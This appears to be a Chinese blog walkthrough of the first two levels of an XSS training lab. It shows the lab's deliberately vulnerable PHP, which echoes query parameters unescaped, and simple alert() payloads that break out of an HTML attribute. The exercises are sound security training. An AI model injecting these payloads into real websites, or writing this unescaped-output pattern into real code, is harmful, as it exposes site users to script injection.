XSS跨站攻击靶场-通关笔记
2023-02-18 16:45:57 时间
XSS攻击是Web攻击中最常见的攻击手法之一,XSS中文名跨站脚本攻击,该攻击是指攻击者在网页中嵌入恶意的客户端脚本,通常是使用JS编写的恶意代码,当正常用户访问被嵌入代码的页面时,恶意代码将会在用户的浏览器上执行,所以XSS攻击主要时针对客户端的攻击手法。
当下常见的 XSS 攻击有三种:反射型、DOM型、存储型。 其中反射型、DOM型可以归类为非持久型 XSS 攻击,存储型归类为持久型 XSS 攻击。
练习环境:https://github.com/lyshark/xss-labs.git
第一关
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
payload : lyshark.com/level1.php?name= <script>alert('hello');</script>
第二关
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'">
<input type=submit name=submit value="搜索"/>
</form>
</center>';
?>
首先确定输入后的内容,在哪里显示出来了。
发现能够闭合
|"><script>alert('xss');</script>
| <input name=keyword value=""><script>alert('xss');</script>">
|
|"onclick="window.alert()
| <input name=keyword value=""onclick="window.alert()">
|
相关文章
- 配置iSCSI部署网络存储
- Lua连续教程之Lua垃圾收集
- SpringBatch实践
- 构建LVS负载均衡集群
- 构建Keepalived高可用集群
- Hexo之Next主题美化代码
- 使用Samba实现文件共享
- 编译Nginx服务部署静态网站
- 配置NFS文件共享服务
- 编译Apache服务部署静态网站
- Flask 框架实现自定义分页
- Lua连续教程之Lua反射
- Flask 框架:运用WTForms实现用户注册
- Flask 之SocketIO库实现绘图表
- 使用 Vercel 部署你的静态网站
- Flask 实现文件上传下载
- 使用 Cloudflare 加速你的网站
- FonePaw iPhone Data Recovery Mac(iphone数据恢复软件) v7.6.0激活版
- Metasploit 生成各种后门
- 5种高大上的yml文件读取方式,你知道吗?